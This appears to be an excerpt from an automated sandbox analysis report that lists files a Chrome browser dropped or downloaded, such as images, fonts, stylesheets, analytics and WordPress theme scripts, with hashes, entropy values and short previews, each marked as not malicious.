                                                                                                                                              MD5:9C6287BDF64843201AF93FF1AFBFAC6C
                                                                                                                                              SHA1:A31D1F6A6DC624C02A6E7767BD9D5AD894C7CDDB
                                                                                                                                              SHA-256:85D05871F6315412DE38A72C7164FD4917EFBA135BA06ED9972C502C1FD811FF
                                                                                                                                              SHA-512:E6AF1947CD5112AC5CCD5042A62FC2F697CAEBAB3441E28D9B3BACD1D6798ECBF099B251CC5D35B62C1D776F6187079E82CE1EAF5B9F5BC882961681C1049877
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR..............pz....+tEXtCreation Time.do 29 dec 2005 02:35:37 +0100........tIME.....(.HYx.....pHYs...........~.....gAMA......a....cIDATx...1.. ....L.."...N ....!...?L%_:...n ..-..C..._MRy..T...VS...=%V.-..?3...Rx..X.1..|3".....|.(.-.W.....IEND.B`.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):535
                                                                                                                                              Entropy (8bit):4.99014468971863
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:t43rcgfq7NufYhzi50UJ8xufJ1RkJJvnN5uf4w7cc7Quf3dR:t43rcyMEYhW50U2xE4xE4Hc7QE3dR
                                                                                                                                              MD5:FCFEF6780B36BEF537381474DF9D0BE9
                                                                                                                                              SHA1:68B2EAD4370E7AB7B70EB6D35A09C31E73C44FD3
                                                                                                                                              SHA-256:51A8613AC1B05EAFB9486E6420336BD8B95DAE7A9D11DEF6318776A61C701A08
                                                                                                                                              SHA-512:EC21F7B6951F00F0DA0ACFDB21BBBE037DCAA2A14F2A1DE02C991F91AF689B1039720801EBB90CA900379766D5726752ED7FD85A349DB508D3F94EDECC4EC0A0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-gb" viewBox="0 0 640 480">. <path fill="#012169" d="M0 0h640v480H0z"/>. <path fill="#FFF" d="m75 0 244 181L562 0h78v62L400 241l240 178v61h-80L320 301 81 480H0v-60l239-178L0 64V0h75z"/>. <path fill="#C8102E" d="m424 281 216 159v40L369 281h55zm-184 20 6 35L54 480H0l240-179zM640 0v3L391 191l2-44L590 0h50zM0 0l239 176h-60L0 42V0z"/>. <path fill="#FFF" d="M241 0v480h160V0H241zM0 160v160h640V160H0z"/>. <path fill="#C8102E" d="M0 193v96h640v-96H0zM273 0v480h96V0h-96z"/>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (611)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):27150
                                                                                                                                              Entropy (8bit):4.357340680151037
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:6bamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:603Mp5If8WOmgW3
                                                                                                                                              MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                                                                                                                                              SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                                                                                                                                              SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                                                                                                                                              SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://t3.awagama.org/favicon.ico
                                                                                                                                              Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (32004)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49143
                                                                                                                                              Entropy (8bit):5.137636357602033
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:9fyxzGdHc1zfA9ZVP4eAnmc6FumKSshD6cD6GLQfq9SvDz2d1FxSuWBlb7myLBK:Ux6dOjARP4Nnmc6FuCshD6cD6xS9ODzw
                                                                                                                                              MD5:F680B1A267329287C8ED3358EF7732EB
                                                                                                                                              SHA1:A11BE43086599CBC7BA370602C038161356F38B6
                                                                                                                                              SHA-256:986AFF2E526C11746107D4F08E128BC6BB8312C4750710BB4F673D7C52F9BA7B
                                                                                                                                              SHA-512:04DC2AE7FFDA9BE7C8A3B2BEC0DA219CFA08E322F932E336270B0C49DAA6569904ABC330E90F97B333D1AA98AF2B9FA492C0A4C6B7816ABFB3B263D26082F996
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/*!. * Isotope PACKAGED v3.0.5. *. * Licensed GPLv3 for open source use. * or Isotope Commercial License for commercial use. *. * https://isotope.metafizzy.co. * Copyright 2017 Metafizzy. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,s,a){function u(t,e,o){var n,s="$()."+i+'("'+e+'")';return t.each(function(t,u){var h=a.data(u,i);if(!h)return void r(i+" not initialized. Cannot call methods, i.e. "+s);var d=h[e];if(!d||"_"==e.charAt(0))return void r(s+" is not a valid method");var l=d.apply(h,o);n=void 0===n?l:n}),void 0!==n?n:t}function h(t,e){t.each(function(t,o){var n=a.data(o,i);n?(n.option(e),n._init()):(n=new s(o,e),a.data(o,i,n))})}a=a||e||t.jQuery,a&&(s.prototype.option||(s.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):43
                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://mc.yandex.com/metrika/advert.gif
                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1258)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):44648
                                                                                                                                              Entropy (8bit):5.4083446744925245
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:TNCNxcm1LiE2AJeFM7j8KV4vveJv6vAegenE+bkA1LeMegeH:xm1LiE2AJGM7j8KOHeJyIegen/eMegeH
                                                                                                                                              MD5:587D383152F344ABF28AB3517D06724A
                                                                                                                                              SHA1:2276C98F5E3EFF77015583F2A52F91AE9745B51F
                                                                                                                                              SHA-256:E1DF5AD2D5A1B9EBAF8A18A8746CF1D19A709B53612B5B2FF7D1BB32F7D22C26
                                                                                                                                              SHA-512:EAA98712E62EFBADC0E13585C5E6C5599B1108AC61AEF67BF1BFDDA84C6ECD2FED6502E4A2D7ECF008ACE07A74B66F816ED76DC0135A4DCA82E04C51C7B444F8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/assets/css/magiczoomplus/magiczoomplus.css
                                                                                                                                              Preview:/*... Magic Zoom Plus v5.3.5 . Copyright 2020 Magic Toolbox. Buy a license: https://www.magictoolbox.com/magiczoomplus/. License agreement: https://www.magictoolbox.com/license/...*/../**. * Core styles. */..MagicZoom,..mz-figure,..mz-lens,..mz-zoom-window,..mz-loading,..mz-hint,..mz-expand .mz-expand-stage,..mz-expand .mz-expand-stage .mz-image-stage,..mz-expand .mz-expand-stage .mz-image-stage .mz-caption,..mz-thumb img,..mz-expand-thumbnails,..mz-expand-controls,..mz-button {. -webkit-box-sizing: border-box;. box-sizing: border-box;.}...MagicZoom,..mz-figure {. display: inline-block;. outline: 0 !important;. font-size: 0 !important;. line-height: 100% !important;. direction: ltr !important;. position: relative;. z-index: 1;. margin: 0 auto;. vertical-align: middle;. -webkit-user-select: none;. -moz-user-select: none;. -ms-user-select: none;. user-select: none;. -webkit-touch-callout: none;. -webkit-tap
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2178
                                                                                                                                              Entropy (8bit):4.887878821170447
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:FstOF+hY4ATunObOBMur7ffAvo4HAaOPG7wcY3zwAv3r:F0hY4QAMuixexMQ3r
                                                                                                                                              MD5:687BF47DDC6ECF6986C7B38C8369F248
                                                                                                                                              SHA1:AFE27D81DAC2B6516E432EF784172D0F66F54DB1
                                                                                                                                              SHA-256:5359F6E24D75B783A04E0BC597AE59D66ACCE61DC74D124BEACA24061DD18E0C
                                                                                                                                              SHA-512:31B97B154AAF9804947972B9AC0DA25C7C1A0AC1261E11CE827A00C0AEB9F084A4B7DA7CB43DC8C09DE0501C4B3C3C3791CD26EC8566E09FE455F599099D7610
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/css/avia-snippet-site-preloader.css?ver=6.0.9
                                                                                                                                              Preview:./*site preloader: http://projects.lukehaas.me/css-loaders/ */..av-siteloader-wrap{.position: fixed;.top:0;.left:0;.right:0;.bottom:0;.width:100%;.height:100%;.z-index: 1000000;.background: #fff;.display:none;.}.html.av-preloader-active{}.html.av-preloader-active .av-siteloader-wrap{display:block;}...av-siteloader-inner{..position: relative;..display: table;..width: 100%;..height:100%;..text-align: center;.}...av-siteloader-cell{display:table-cell; vertical-align: middle;}....av-siteloader , #top div.avia-popup .mfp-preloader{. font-size: 10px;. position: relative;. text-indent: -9999em;. margin:0 auto;. border-top: .2px solid rgba(0, 0, 0, 0.2);. border-right: 2px solid rgba(0, 0, 0, 0.2);. border-bottom:2px solid rgba(0, 0, 0, 0.2);. border-left: 2px solid #000;. -webkit-animation: av-load8 0.8s infinite linear;. animation: av-load8 0.8s infinite linear;.}..#top div.avia-popup .mfp-preloader{..position: absolute;..background: transparent;..border-top: 2px solid #fff;.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):18596
                                                                                                                                              Entropy (8bit):7.988788312296589
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:h5D5WUhNanar/Z19V6iGCYIqoPfHwfr13GPgqbrxremyFKKWB:h/NaOrBGCYIBPfQD1xqPhl
                                                                                                                                              MD5:C83E4437A53D7F849F9D32DF3D6B68F3
                                                                                                                                              SHA1:FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
                                                                                                                                              SHA-256:D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
                                                                                                                                              SHA-512:C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                                              Preview:wOF2......H...........H=................................|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q*.......u*D.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=9, manufacturer=FUJIFILM, model=X-S10, xresolution=138, yresolution=146, resolutionunit=2, software=Adobe Photoshop Lightroom Classic 13.4 (Windows), datetime=2024:07:26 14:18:28], baseline, precision 8, 1500x630, components 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1239965
                                                                                                                                              Entropy (8bit):7.960786231140686
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:Xe60ItaExfe+3XbR3nhtCgyp9cfrgY005OdIQ8s3zux1dUFybGAW2W:wQ1w+TYg49o0kagxn+2W
                                                                                                                                              MD5:F0579B8AE93BD1FEA23B93C2C436D08D
                                                                                                                                              SHA1:452C4E59A795133CE344275F3ACD8B93E04A4B24
                                                                                                                                              SHA-256:2FE962E388BA7FCAAF4AD6F6BEDD012C7721DBD4928BBD6454096FED37AD0950
                                                                                                                                              SHA-512:5CBA97DB96D0D59ED24911F0F38F68E92974DADC4EA9F9D629FAD2A662F75805D1B2C18474B38F5764C48695D7CCB5D7ACCADF419CE8716E5D87104FB70E26AD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......JFIF............:.Exif..II*...............z.......................................(...........1...1.......2...........;...........i...............FUJIFILM..X-S10.................Adobe Photoshop Lightroom Classic 13.4 (Windows)..2024:07:26 14:18:28.YOUGENIO..'........................."...........'...........0...................0232............................................................................................$...........,...........4...............................................<.......................D...........L.......................................................................................................................................1.......T...2.......^...3.......~...4...........5...................}...........2024:07:17 19:15:38.2024:07:17 19:15:38.+02:00..+01:00..+01:00...Jj.@B..f...@B......d.......d...d...d.......d...d.......d.......1D000530......d.......d.......d.......d...Viltrox.AF 13/1.4 XF..00000404........................................(.....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2939
                                                                                                                                              Entropy (8bit):4.941391789017286
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2z4A0lVGeY/taXF7dIihItut4n5FkIoY0rfMQgradiyOIf:2z4DlVGz/taXF7dphItutczSY0rfMQgm
                                                                                                                                              MD5:EA8D6B21B144DFD4101BD9D2F57FD07F
                                                                                                                                              SHA1:038D9D975D6A6783E04D564E5924ED2E65F0FF9B
                                                                                                                                              SHA-256:A7C3452D5BD50C5D4F1F12F2EBEA924C57D1BA2B6A6193227CF984655D58E477
                                                                                                                                              SHA-512:281073FAF73BAB703C695153E484E9737CB04CAA0750E2156673D0B06B0D0072866A27940220B119C10884A21D9FEB1AAA997845B43D5DF07367208F16E6B41F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// .// AVIA Countdown.// .// -------------------------------------------------------------------------------------------.(function($).{ .."use strict";....var _units.= ['weeks','days','hours','minutes','seconds'],..._second = 1000,..._minute = _second * 60,..._hour .= _minute * 60,..._day .= _hour * 24,..._week.= _day * 7,....ticker.= function(_self)...{....var _time..= {},....._now ..= new Date(),....._timestamp = _self.end - _now;........if(_timestamp <= 0)....{.....clearInterval(_self.countdown);.....return;....}........._self.time.weeks .= Math.floor( _timestamp / _week);...._self.time.days .= Math.floor((_timestamp % _week) / _day);...._self.time.hours.= Math.floor((_timestamp % _day) / _hour); ...._self.time.minutes .= Math.floor((_timestamp % _hour) / _minute); ...._self.time.seconds .= Math.floor((_timestamp % _minute) / _second); ........switch(_self.data.maximum)....{.....case 1:
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (2343)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):52916
                                                                                                                                              Entropy (8bit):5.51283890397623
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.google-analytics.com/analytics.js
                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40642
                                                                                                                                              Entropy (8bit):5.193260399697844
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:1QaewHeUnfqAF1NnKJODRvzub+ysyvyDyvysyvyDy1VfTUaP61VLfL+UIbYm+Sb9:1QaewHeUn7F1NnKJOD5zubBz6+6z6+1V
                                                                                                                                              MD5:A94D1A7B5AE1459791A05B1ECCBD3212
                                                                                                                                              SHA1:FB1A535EB1430E5F6CAED592536E9CA5C1AD2810
                                                                                                                                              SHA-256:D04ACC209BDD31276518D4222608D66CB076DEF6FE8352A6C467730D9DC80136
                                                                                                                                              SHA-512:75EEE0E73CC2118609E4EC264E936D0E6D733241864CE7D9C7A26B349EE12363494BDDC54B83ECB8728C2E2934C4DD8C59FF18C70BF8CBFEE9DC559C29347E4C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{.. "use strict";.. $(document).ready(function(). {.. .//global variables that are used on several ocassions. .$.avia_utilities = $.avia_utilities || {};. .. .if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) && 'ontouchstart' in document.documentElement). .{. ..$.avia_utilities.isMobile = true;. .}. .else. .{. ..$.avia_utilities.isMobile = false;. .}. . .//activate fixed bg fallback for mobile. .if($.fn.avia_mobile_fixed)...$('.avia-bg-style-fixed').avia_mobile_fixed();. .. .//activate parallax scrolling for backgrounds.. .if($.fn.avia_parallax)...$('.av-parallax').avia_parallax();. .. .//calculate the browser height and append a css rule to the head...if($.fn.avia_browser_height)...$('.av-minimum-height, .avia-fullscreen-slider, .av-cell-min-height').avia_browser_height();......//calculate the height of each video section...if($.fn.avia_video_section)... $('.a
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (33229)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):33407
                                                                                                                                              Entropy (8bit):4.7584710387647835
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:Wb+rB31zxcjzc61CrDam31bvG91QCQ/HUMNYmB1vcv/PEsQ/4j:731zxcfc6IyUFv61dQ/0MOm3izQ/Y
                                                                                                                                              MD5:E35D9C4EBAEA0573DF8E4A9505B72EEA
                                                                                                                                              SHA1:5FBB384CD8CD7A64483E6487D8D8179A633F9954
                                                                                                                                              SHA-256:9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
                                                                                                                                              SHA-512:C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                                                                                                                              Preview:/*!. * Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1485), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1485
                                                                                                                                              Entropy (8bit):5.142774489176319
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ExkffRGjM7LGrYRS7zsQCBm3lBmGa0BTLWwMWiB/azfIvJks8Df:EWRIDY8QQuKTLWnBeYks8L
                                                                                                                                              MD5:1244D3F2F28ECC6619157927ACA95200
                                                                                                                                              SHA1:A9AAFCF49F49145093FC831EFD9B8E2F6C71BB9C
                                                                                                                                              SHA-256:6C5ACBB82A46A4971660F65131241DFFCC28828F4DBD76B8EC7BAB0B468250F8
                                                                                                                                              SHA-512:3686AFB82F76DA09848C154CCB79A5213DC67698763412E526216FBCE17A94BD0B1762DA3627677B3EE97A05CDC837739FDC4DBDC08B13FBD50CBB0FB9A0B512
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:!function(e){function r(r){for(var n,l,f=r[0],i=r[1],p=r[2],c=0,s=[];c<f.length;c++)l=f[c],Object.prototype.hasOwnProperty.call(o,l)&&o[l]&&s.push(o[l][0]),o[l]=0;for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n]);for(a&&a(r);s.length;)s.shift()();return u.push.apply(u,p||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,f=1;f<t.length;f++)0!==o[t[f]]&&(n=!1);n&&(u.splice(r--,1),e=l(l.s=t[0]))}return e}var n={},o={0:0},u=[];function l(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,l),t.l=!0,t.exports}l.m=e,l.c=n,l.d=function(e,r,t){l.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},l.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},l.t=function(e,r){if(1&r&&(e=l(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(l.r(t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1782
                                                                                                                                              Entropy (8bit):4.907881383550967
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:oZYZ3m5KnG2yj/iyiiGibYeX/QiDjhgGo2mUGbvybQbcNZe/oYYIXJiWGrjLVWw1:g/mxyziypbKckyQ8ZeVPGfH/9
                                                                                                                                              MD5:3C711BE05B8B99FF511929A32A65FF4E
                                                                                                                                              SHA1:471AE4F8052AE9BC6528E7BE1DD57D3461C01F9F
                                                                                                                                              SHA-256:D7C9B8D74BF2D734B1215CA56D81F9BED8DD251405A99D406C44E27FC6C9D2EA
                                                                                                                                              SHA-512:EAA1ADDD6239859003A10D33B7CABF4420B2DBD5DEE3BF0DD4E1C201F301860A6E471B519763ED0B58B28AE39F91DD49A02120FA733A805A337E039C139C1580
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// .// AVIA Magazine function for magazine sorting.// .// -------------------------------------------------------------------------------------------.(function($).{ .."use strict";....var animating = false,...methods = {......switchMag: function(clicked, _self)...{....var current ..= $(clicked)........if(current.is('.active_sort') || animating) return;........var filter...= current.data('filter'),.....oldContainer.= _self.container.filter(':visible'),.....newContainer.= _self.container.filter('.' + filter);........//switch Class....animating = true;...._self.sort_buttons.removeClass('active_sort');....current.addClass('active_sort');........//apply fixed heiht for transition...._self.magazine.height(_self.magazine.outerHeight());........//switch items....oldContainer.avia_animate({opacity:0}, 200, function()....{.....oldContainer.css({display:'none'});.....newContainer.css({opacity:0, display
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3992
                                                                                                                                              Entropy (8bit):5.591011855888861
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:wOEaCgOEa3FZOfOEaiOEaEJc+ujOEaUNzOpaCgOpa3FZOfOpaiOpaEJc+ujOpaUu:/Cvmo1AVSCSmBMAsX
                                                                                                                                              MD5:2090BEB037F32795B478A4EFC49169FD
                                                                                                                                              SHA1:B9855F15009536715C099A558F22B1CE904BF6A7
                                                                                                                                              SHA-256:D6007057C57B5631CBF65083E601AA576397B0487F11C9DA06F80D1F9A3F7F01
                                                                                                                                              SHA-512:438DB9686A150E28DF1D75594D1A8646641CB5E03E7E4A456AF0014A1A7BC064597D17999BF4C91F7BF0A1618339D91390B73237FDA2EB539333D0FD5E3B835F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:"https://fonts.googleapis.com/css?family=Oswald:400,700&display=swap"
